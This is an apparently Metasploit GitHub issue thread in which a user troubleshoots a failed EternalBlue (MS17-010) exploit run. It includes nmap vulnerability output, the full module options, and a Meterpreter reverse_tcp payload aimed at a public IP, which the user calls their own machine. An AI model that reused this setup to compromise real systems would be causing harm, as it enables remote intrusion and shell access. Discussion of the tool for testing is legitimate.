Closed kalifan closed 7 years ago
void-in
commented
7 years ago The target server might be updated and patched. Have you checked if it is still missing the KB? You can check it through wmic qfe hotfixid | find "<MS17-010 KB for the OS>". You can find more info at https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed
kalifan
commented
7 years ago @void-in Ey bro thanks for answer me, but the target it was checked using nmap and script about vulnerability ms17-10 and the target it is vulnerable, the victim machine is my computer from WAN. any suggestion?
busterb
commented
7 years ago Do you have any target details (what OS, etc.) ?
kalifan
commented
7 years ago @busterb hi again here are the information
iam using nmap to check vulnerability and information about of target
Host is up (0.29s latency). PORT STATE SERVICE 445/tcp open microsoft-ds
| Host script results: | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: SECURITYV01 | NetBIOS computer name: SECURITYV01\x00 | Workgroup: WORKGROUP\x00 | _ System time: 2017-06-15T20:35:03-05:00 | smb-vuln-ms17-10: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Disclosure date: 2017-03-14 | |||||||||||||||
| References: | |||||||||||||||
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | |||||||||||||||
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | |||||||||||||||
| _ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |
msf exploit(ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 192.168.0.106:4444 [] 190.11.20.72:445 - Connecting to target for exploitation. [-] 190.11.20.72:445 - RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [*] Exploit completed, but no session was created. msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName explorer.exe yes Process to inject payload into. RHOST 190.11.xx.xx yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.106 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
thanks.
busterb
commented
7 years ago closing in favor of #8835
before update exploit does it work fine. i dont needed use credentials. i could execute arbitrarily.